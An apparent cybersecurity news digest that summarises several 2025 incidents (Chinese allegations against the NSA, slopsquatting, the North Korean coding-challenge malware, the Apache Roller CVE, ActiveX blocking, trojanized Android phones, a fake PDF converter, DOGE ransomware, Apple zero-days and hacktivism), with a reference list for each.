China has accused the United States National Security Agency (NSA) of launching "advanced" cyberattacks during the Asian Winter Games in February 2025, targeting essential industries. Police in the northeastern city of Harbin have placed three alleged NSA agents on a wanted list, accusing them of attacking the Winter Games' event information system and key information infrastructure in Heilongjiang province, where Harbin is located. The named NSA agents are Katheryn A. Wilson, Robert J. Snelling, and Stephen W. Johnson, all allegedly members of the NSA's Tailored Access Operations (TAO) offensive cyber unit.

China Daily reports the TAO targeted systems used for registration, timekeeping, and competition entry at the Games, systems which store "vast amounts of sensitive personal data." The publication also stated the TAO appeared to be trying to implant backdoors and used multiple front organizations to purchase servers in Europe and Asia to conceal its tracks and acquire the tools used to breach Chinese systems. A joint report from China's computer emergency response centers (CERTs) stated that over 270,000 attacks on the Asian Winter Games were detected, with 170,000 allegedly launched by the US.

Chinese foreign ministry spokesperson Lin Jian condemned the alleged cyber activity, urging the U.S. to take a responsible attitude on cybersecurity issues and stop any attacks and "groundless vilification against China." Xinhua reported the agents repeatedly carried out cyber attacks on China’s critical information infrastructure and participated in cyber attacks on Huawei and other enterprises. Chinese law enforcement agencies are seeking information that could lead to the arrest of the three NSA operatives, though rewards were not disclosed.

Recommended read:
References :
  • The Register - Security: China names alleged US snoops over Asian Winter Games attacks
  • www.cybersecurity-insiders.com: China accuses US of launching advanced Cyber Attacks on its infrastructure
  • CyberScoop: Chinese law enforcement places NSA operatives on wanted list over alleged cyberattacks
  • DataBreaches.Net: China accuses US of launching ‘advanced’ cyberattacks, names alleged NSA agents
  • www.scworld.com: China's allegation that NSA hacked Asian Winter Games draws suspicion
  • cyberscoop.com: Chinese law enforcement places NSA operatives on wanted list over alleged cyberattacks
  • PCMag UK security: Police in the Chinese city of Harbin say three NSA operatives disrupted the 2025 Asian Winter Games and hacked Huawei.
  • www.csoonline.com: China accused the United States National Security Agency (NSA) on Tuesday of launching “advanced†cyberattacks during the Asian Winter Games in February, targeting essential industries.
  • Metacurity: China accuses NSA of 'advanced cyberattacks' during the Asian Winter Games
  • www.metacurity.com: China accuses NSA of 'advanced cyberattacks' during the Asian Winter Games
  • www.dailymail.co.uk: China accuses US of launching 'advanced' cyberattacks, names alleged NSA agents
  • sysdig.com: UNC5174’s evolution in China’s ongoing cyber warfare: From SNOWLIGHT to VShell

@www.csoonline.com //
A new cyber threat called "slopsquatting" is emerging, exploiting AI-generated code and posing a risk to software supply chains. Researchers have discovered that AI code generation tools, particularly Large Language Models (LLMs), often "hallucinate" non-existent software packages or dependencies. Attackers can capitalize on this by registering these hallucinated package names and uploading malicious code to public repositories like PyPI or npm. When developers use AI code assistants that suggest these non-existent packages, the system may inadvertently download and execute the attacker's malicious code, leading to a supply chain compromise.

This vulnerability arises because popular programming languages rely heavily on centralized package repositories and open-source software. The combination of this reliance with the increasing use of AI code-generating tools creates a novel attack vector. A study analyzing 16 code generation AI models found that nearly 20% of the recommended packages were non-existent. When the same prompts were repeated, a significant portion of the hallucinated packages were repeatedly suggested, making the attack vector more viable for malicious actors. This repeatability suggests that the hallucinations are not simply random errors but a persistent phenomenon, increasing the potential for exploitation.

Security experts warn that slopsquatting represents a form of typosquatting, where variations or misspellings of common terms are used to deceive users. To mitigate this threat, developers should exercise caution when using AI-generated code and verify the existence and integrity of all suggested packages. Organizations should also implement robust security measures to detect and prevent the installation of malicious packages from public repositories. As AI code generation tools become more prevalent, it is crucial to address this new vulnerability to protect the software supply chain from potential attacks.

Recommended read:
References :

@unit42.paloaltonetworks.com //
North Korean state-sponsored group Slow Pisces, also known as Jade Sleet, TraderTraitor, and PUKCHONG, is actively targeting cryptocurrency developers through social engineering campaigns on LinkedIn. Security researchers at Palo Alto Networks have uncovered a scheme where the group poses as potential employers, enticing developers with coding challenges that are actually malware delivery mechanisms. The malicious activity is suspected to be connected to the massive Bybit hack that occurred in February 2025.

The attackers send what appear to be legitimate coding assignments to the developers, but these challenges contain malware disguised within compromised projects. When the developers run these projects, their systems become infected with new customized Python malware dubbed RN Loader and RN Stealer. RN Loader collects basic information about the victim's machine and operating system, sending it to a remote server, while RN Stealer is designed to harvest sensitive data from infected Apple macOS systems, including system metadata and installed applications.

GitHub and LinkedIn have taken action to remove the malicious accounts used by Slow Pisces. Both companies affirm that they use automated technology, expert teams, and user reporting to combat malicious actors. Palo Alto Networks customers are protected through their Next-Generation Firewall with Advanced URL Filtering and Advanced DNS Security subscriptions. They urge those who suspect they might be compromised to contact the Unit 42 Incident Response team.

Recommended read:
References :
  • Virus Bulletin: VirusBulletin reports on Slow Pisces (aka Jade Sleet, TraderTraitor, PUKCHONG) campaign targeting cryptocurrency developers on LinkedIn, posing as potential employers and sending malware disguised as coding challenges.
  • unit42.paloaltonetworks.com: Unit 42 reports that North Korean state-sponsored group Slow Pisces (Jade Sleet) targeted crypto developers with a social engineering campaign that included malicious coding challenges.
  • securityonline.info: Slow Pisces Targets Crypto Developers with Deceptive Coding Challenges
  • The Hacker News: Crypto Developers Targeted by Python Malware Disguised as Coding Challenges
  • Unit 42: Slow Pisces Targets Developers With Coding Challenges and Introduces New Customized Python Malware
  • Security Risk Advisors: Slow Pisces Targets Crypto Developers With “Coding Challenges†That Deliver New RN Loader and RN Stealer Malware
  • www.itpro.com: Hackers are duping developers with malware-laden coding challenges
  • cyberpress.org: Slow Pisces Hackers Target Developers with Malicious Python Coding Tests
  • gbhackers.com: Slow Pisces Group Targets Developers Using Coding Challenges Laced with Python Malware
  • gbhackers.com: Slow Pisces Group Targets Developers Using Coding Challenges Laced with Python Malware
  • sra.io: #NorthKorea - based #SlowPisces group hits #Crypto devs with #LinkedIn “coding challengesâ€! Repos mask #Python & #JS malware using YAML/EJS tricks.
  • Security Risk Advisors: #NorthKorea - based #SlowPisces group hits #Crypto devs with #LinkedIn “coding challengesâ€! Repos mask #Python & #JS malware using YAML/EJS tricks.

info@thehackernews.com (The@The Hacker News //
A critical security vulnerability, CVE-2025-24859, has been discovered in Apache Roller, a widely used Java-based blogging platform. The flaw, which carries a CVSS score of 10.0, affects all versions from 1.0.0 up to and including 6.1.4. This vulnerability allows malicious actors to retain unauthorized access to blog sites even after a password change.

The core of the issue lies in insufficient session expiration. When a user or administrator changes a password, Apache Roller versions before 6.1.5 do not properly invalidate existing sessions. Consequently, any session tokens or cookies issued before the password change remain valid, creating a significant security risk. An attacker who has compromised a user’s credentials can maintain access to the application through the old session, effectively bypassing the intended protection of a password change.

Administrators and users of Apache Roller are strongly advised to upgrade to version 6.1.5 or later. This update implements centralized session management, ensuring that all active sessions are terminated immediately upon password changes or user deactivation. In related news, a critical vulnerability in Gladinet CentreStack also affects its Triofox remote access solution, leading to multiple organizations being compromised.

Recommended read:
References :
  • Cyber Security News: A critical security vulnerability, CVE-2025-24859, has been discovered in Apache Roller, a widely used Java-based blogging platform.
  • Anonymous ???????? :af:: A recently disclosed security flaw in Gladinet CentreStack also impacts its Triofox remote access and collaboration solution, according to Huntress, with seven different organizations compromised to date.
  • securityaffairs.com: A critical vulnerability, tracked as CVE-2025-24859 (CVSS score of 10.0), affects the Apache Roller open-source, Java-based blogging server software.
  • securityonline.info: A security vulnerability has been identified in Apache Roller, a Java-based blog server, that could allow unauthorized access
  • The Hacker News: A critical security vulnerability has been disclosed in the Apache Roller open-source, Java-based blogging server software that could allow malicious actors to retain unauthorized access even after a password change.

@securityonline.info //
A critical security vulnerability has been discovered in Apache Roller, a Java-based blogging server software. The flaw, identified as CVE-2025-24859 and carrying a maximum severity CVSS score of 10.0, allows attackers to retain unauthorized access even after a user changes their password. This session management issue affects Apache Roller versions up to and including 6.1.4, potentially exposing blogs to unauthorized actions and undermining the security measures intended by password changes.

The vulnerability stems from the failure to properly invalidate active user sessions when a password is changed, either by the user or an administrator. This means that an attacker who has compromised a user's credentials could maintain continued access through an old session, even after the user has taken steps to secure their account by changing their password. This poses a significant risk, as it could enable unauthorized individuals to access and manipulate blog content, potentially leading to data breaches or other malicious activities.

To address this critical flaw, Apache Roller version 6.1.5 has been released with a fix that implements centralized session management. This ensures that all active sessions are invalidated when passwords are changed or users are disabled, effectively preventing attackers from maintaining unauthorized access. Users of Apache Roller are strongly advised to upgrade to version 6.1.5 as soon as possible to mitigate the risk of exploitation and safeguard their blog sites from potential security breaches. The vulnerability was discovered and reported by security researcher Haining Meng.

Recommended read:
References :
  • securityaffairs.com: Critical Apache Roller flaw allows to retain unauthorized access even after a password change
  • securityonline.info: CVE-2025-24859 (CVSSv4 10): Apache Roller Flaw Exposes Blogs to Unauthorized Access
  • The Hacker News: Critical Apache Roller Vulnerability (CVSS 10.0) Enables Unauthorized Session Persistence
  • bsky.app: 10/10 CVSS in the Apache Roller blogging platform "active user sessions are not properly invalidated after password changes"
  • ciso2ciso.com: Critical Apache Roller flaw allows to retain unauthorized access even after a password change – Source: securityaffairs.com
  • lists.apache.org: Apache Roller Fails to Invalidate Sessions on Password Change (CVE-2025-24859)

@www.bleepingcomputer.com //
Microsoft is set to block ActiveX controls by default in the Windows versions of Microsoft 365 Apps and Office 2024. This move, announced in April 2025, aims to enhance security by addressing vulnerabilities associated with the legacy software framework. ActiveX controls, introduced in 1996, enabled developers to create interactive objects embedded in Office documents. However, over time, these controls have become a significant point of entry for cybercriminals, similar to macros in Excel, with examples such as the propagation of the TrickBot malware through ActiveX.

Microsoft's decision to disable ActiveX controls by default is part of a broader effort to bolster the security of its products. Since 2018, the company has implemented various measures to block attack vectors exploiting Office applications. These include blocking VBA macros, disabling Excel 4.0 (XLM) macros by default, blocking untrusted XLL add-ins, and phasing out VBScript. The default setting previously was to prompt users before enabling ActiveX, which required users to understand the risks before granting permissions.

When the change is deployed, users will receive a notification stating "BLOCKED CONTENT: The ActiveX content in this file is blocked" if a document contains an ActiveX control. This measure is intended to reduce the risk of malware or unauthorized code execution. Users can re-enable ActiveX controls through the Trust Center, provided administrators have granted them access to the ActiveX settings page. This change is more secure as it blocks the controls entirely.

Recommended read:
References :
  • The Register - Software: ActiveX blocked by default in Microsoft 365 because remote code execution is bad, OK?
  • Will Dormann: Microsoft blocks ActiveX by default in Microsoft 365, Office 2024 About damn time!
  • www.bleepingcomputer.com: Microsoft blocks ActiveX by default in Microsoft 365, Office 2024
  • IT-Connect: Microsoft : les contrôles ActiveX bientôt bloqués par défaut dans Office et Microsoft 365 Apps
  • www.it-connect.fr: Microsoft : les contrôles ActiveX bientôt bloqués par défaut dans Office et Microsoft 365 Apps
  • BleepingComputer: Microsoft blocks ActiveX by default in Microsoft 365, Office 2024
  • Cyber Security News: Microsoft Disables ActiveX by Default in 365 to Block Malware Execution by Hackers

Pierluigi Paganini@securityaffairs.com //
A new cybersecurity threat has emerged, with cheap Chinese Android phones being shipped with pre-installed malware disguised as popular messaging apps like WhatsApp and Telegram. These trojanized applications contain cryptocurrency clippers, malicious programs designed to replace copied wallet addresses with those controlled by the attackers. This allows the theft of cryptocurrency during transactions without the user's knowledge. The campaign, active since June 2024, targets low-end devices, often mimicking premium brands like Samsung and Huawei, with models such as "S23 Ultra," "Note 13 Pro," and "P70 Ultra." At least four of the affected models are manufactured under the SHOWJI brand.

These counterfeit phones often spoof their technical specifications, falsely displaying that they are running the latest Android version and have improved hardware to avoid detection. According to researchers at Doctor Web, the infected devices ship with modified versions of WhatsApp that operate as clippers. These malicious programs quietly swap out wallet strings for popular coins like Ethereum and Tron whenever users send or receive them through chat. Victims remain unaware as the malware displays the correct wallet address on the sender’s screen but delivers the wrong one to the receiver, and vice versa, until the money disappears.

The attackers have expanded their reach beyond WhatsApp and Telegram, with researchers identifying nearly 40 fake applications, including crypto wallets like Trust Wallet and MathWallet, and even QR code readers. The malware is injected using a tool called LSPatch, allowing modifications without altering the core app code, which helps evade detection and survive updates. Doctor Web reports that the malware hijacks the app update process to retrieve an APK file from a server under the attacker's control and searches for strings in chat conversations that match cryptocurrency wallet address patterns.

Recommended read:
References :
  • hackread.com: Pre-Installed Malware on Cheap Android Phones Steals Crypto via Fake WhatsApp
  • securityaffairs.com: Chinese Android phones shipped with malware-laced WhatsApp, Telegram apps
  • The Hacker News: Chinese Android Phones Shipped with Fake WhatsApp, Telegram Apps Targeting Crypto Users
  • hackread.com: Pre-Installed Malware on Cheap Android Phones Steals Crypto via Fake WhatsApp

Aman Mishra@gbhackers.com //
A sophisticated malware campaign impersonating PDFCandy.com is distributing the ArechClient2 information stealer, according to research from CloudSEK. Cybercriminals are creating fake websites that closely mimic the legitimate PDF conversion tool, tricking users into downloading malware. These deceptive sites are promoted through Google Ads and exploit the common need for online file conversion. By replicating the user interface and using similar domain names, attackers deceive unsuspecting users into believing they are interacting with a trusted service.

The attack unfolds through a series of social engineering tactics. Victims are prompted to upload a PDF file for conversion, after which a simulated loading sequence creates the illusion of genuine file processing. This builds trust and lowers the user’s guard. Subsequently, users are presented with a fake CAPTCHA verification dialog, designed to enhance the site’s perceived authenticity and create a sense of urgency, potentially rushing the user into action. The CAPTCHA acts as a pivotal interaction point to trigger the malicious payload.

After the fake conversion process and CAPTCHA interaction, users are prompted to execute a PowerShell command. This command initiates a sophisticated redirection chain to obscure the malware delivery, ultimately leading to the distribution of the ArechClient2 infostealer. The malware is known for its ability to steal sensitive data, including browser credentials and cryptocurrency wallet information. Cybersecurity experts advise users to rely on verified tools from official websites, keep anti-malware software updated, and implement endpoint detection and response solutions to defend against these advanced threats.

Recommended read:
References :
  • hackread.com: CloudSEK uncovers a sophisticated malware campaign where attackers impersonate PDFCandy.com to distribute the ArechClient2 information stealer. Learn how…
  • securityonline.info: Beware Fake PDF Converters: A Social Engineering Threat
  • www.scworld.com: Infostealer deployed via bogus PDFCandy converter
  • Cyber Security News: CyberPress: Beware! Online PDF Converters Luring Users into Installing Password-Stealing Malware
  • hackread.com: CloudSEK uncovers a sophisticated malware campaign where attackers impersonate PDFCandy.com to distribute the ArechClient2 information stealer

@nvd.nist.gov //
Cyble Research and Intelligence Labs (CRIL) has uncovered a new ransomware operation dubbed "DOGE BIG BALLS Ransomware." This campaign uses a finance-themed ZIP file named "Pay Adjustment.zip" to trick users into executing malicious shortcut files. These files then trigger multi-stage PowerShell scripts, ultimately delivering custom payloads that include a kernel-mode exploit tool and reconnaissance modules. The ransomware itself is a modified version of Fog, further customized with a provocative name that references a known public figure.

The attention-grabbing name is likely a deliberate attempt to misdirect attention and create confusion, potentially questioning the effectiveness of governmental cybersecurity efforts. Despite the name's provocative nature, the attack mechanism is relatively simple. The ransomware is typically distributed via a compressed ZIP file, sometimes disguised as a PDF document. Once opened, the malicious payload bypasses traditional security defenses using obfuscation and anti-detection techniques.

The DOGE Big Balls ransomware attack highlights the evolving tactics of cybercriminals, blending technical sophistication with psychological manipulation. It also demonstrates the increasing trend of ransomware attacks targeting the healthcare sector, as seen with the recent attack on DaVita, a Denver-based dialysis firm. This incident underscores the critical need for organizations to bolster their cybersecurity defenses and incident response capabilities to protect sensitive data and maintain operational continuity.

Recommended read:
References :
  • cyble.com: This attack leverages a ZIP file with a deceptive LNK shortcut to silently execute a multi-stage PowerShell-based infection chain, ensuring stealthy deployment. A vulnerable driver ( ) is exploited through a Bring Your Own Vulnerable Driver (BYOVD) technique to gain kernel-level read/write access for privilege escalation. The payload is a customized version of Fog ransomware, branded as "DOGE BIG BALLS Ransomware," reflecting an attempt to add psychological manipulation and misattribution. Ransomware scripts include provocative political commentary and the use of a real individual's name and address, indicating intent to confuse, intimidate, or mislead victims. The malware uses router MAC addresses (BSSIDs) and queries the Wigle.net API to determine the victim’s physical location—offering more accurate geolocation than IP-based methods. Extensive system and network information, including hardware IDs, firewall states, network configuration, and running processes, is collected via PowerShell, aiding attacker profiling. Embedded within the toolkit is a Havoc C2 beacon, hinting at the threat actor’s (TA's) potential to maintain long-term access or conduct additional post-encryption activities.
  • Davey Winder: DOGE Big Balls Ransomware Attack — What You Need To Know
  • thecyberexpress.com: TheCyberExpress: DOGE BIG BALLS Campaign Blurs Lines Between Exploitation, Recon, and Reputation Damage
  • www.cybersecurity-insiders.com: DOGE Big Balls Ransomware turns into a big cyber threat
  • www.cybersecurity-insiders.com: DOGE Big Balls Ransomware turns into a big cyber threat
  • www.cysecurity.news: CySecurity: DOGE Big Balls Ransomware turns into a big cyber threat

@techcrunch.com //
Apple has released emergency security updates to address two zero-day vulnerabilities that have been actively exploited in targeted attacks against specific iPhone users. The company confirmed that these vulnerabilities were leveraged in an "extremely sophisticated attack" and urged users to update their devices immediately. The bugs, identified as CVE-2025-31200 and CVE-2025-31201, impact iOS, macOS, tvOS, iPadOS, and visionOS.

The first vulnerability, CVE-2025-31200, is located in CoreAudio, Apple's system-level component for audio processing. According to Apple, this flaw can be triggered by processing a maliciously crafted audio stream within a media file, potentially allowing attackers to execute arbitrary code on the affected device. The second flaw, CVE-2025-31201, allows attackers to bypass Pointer Authentication Codes (PAC), a security feature designed to prevent memory corruption attacks. Apple credited the discovery of one of the bugs to security researchers working at Google’s Threat Analysis Group, which investigates government-backed cyberattacks. This may indicate that the attacks targeting Apple customers were launched or coordinated by a nation state or government agency.

To mitigate the risk, Apple has released iOS 18.4.1/iPadOS 18.4.1 for iPhones and iPads, macOS Sequoia 15.4.1, tvOS 18.4.1, and visionOS 2.4.1 for the Apple Vision Pro. Users are strongly advised to update their devices to the latest versions. Apple has not released details on who was behind the attacks, how widespread they were, or whether any users were successfully compromised.

Recommended read:
References :
  • techcrunch.com: Apple says it's fixed two zero-day security bugs that may've been used in an extremely sophisticated attack against specific targeted individuals on iOS.
  • PCMag UK security: Apple Patches iPhone Bug Involving Malicious Media Files
  • www.bleepingcomputer.com: BleepingComputer: Apple fixes two zero-days exploited in targeted iPhone attacks
  • securityonline.info: Security Online: Urgent Apple Security Patch: Zero-Day Exploits Target iPhones
  • securityonline.info: Urgent Apple Security Patch: Zero-Day Exploits Target iPhones

@cyble.com //
References: cyble.com , threatmon.io
Hacktivist groups are increasingly adopting sophisticated and destructive attack methods, moving beyond basic DDoS attacks to target critical infrastructure with ransomware. These groups, motivated by ideological goals, are focusing on government platforms and industrial manufacturers. Pro-Russian hacktivists are primarily targeting NATO-aligned nations and supporters of Ukraine, while pro-Ukrainian, pro-Palestinian, and anti-establishment groups are focusing on Russia, Israel, and the United States. This evolution reflects a shift towards hybrid warfare tactics, combining DDoS, credential leaks, and ICS disruption to overcome single-layer defenses.

The energy sector is particularly vulnerable, with successful cyber breaches posing severe risks to national security, economic stability, and public safety. The CyberAv3ngers, an Iranian state-sponsored hacker group, exemplifies this threat. Despite masquerading as hacktivists, they are actively targeting industrial control systems in water, gas, oil and gas, and other critical infrastructure sectors worldwide. The group has already caused global disruption and shows no signs of slowing down. Their actions represent a rare example of state-sponsored cybersaboteurs crossing the line and disrupting critical infrastructure.

Reports and investigations highlight vulnerabilities within power grids and other key systems. Recent investigations have revealed hidden capabilities in Chinese-manufactured power transformers that could allow remote shutdown from overseas. This discovery prompted concerns about potential "sleeper cells" within critical national systems. Furthermore, ransomware attacks continue to be a major threat, causing operational disruptions, data breaches, and financial losses. The industry is responding with increased cybersecurity investment and proactive strategies as professionals see cybersecurity as the greatest risk to their business.

Recommended read:
References :
  • cyble.com: Cyble report on hacktivists moving into ransomware attacks.
  • threatmon.io: Reports Reports Spyware Based on SpyMax Download Report Ransomware attacks remain one of the most critical threats to modern businesses, leading to severe operational disruptions, data breaches, and substantial financial losses.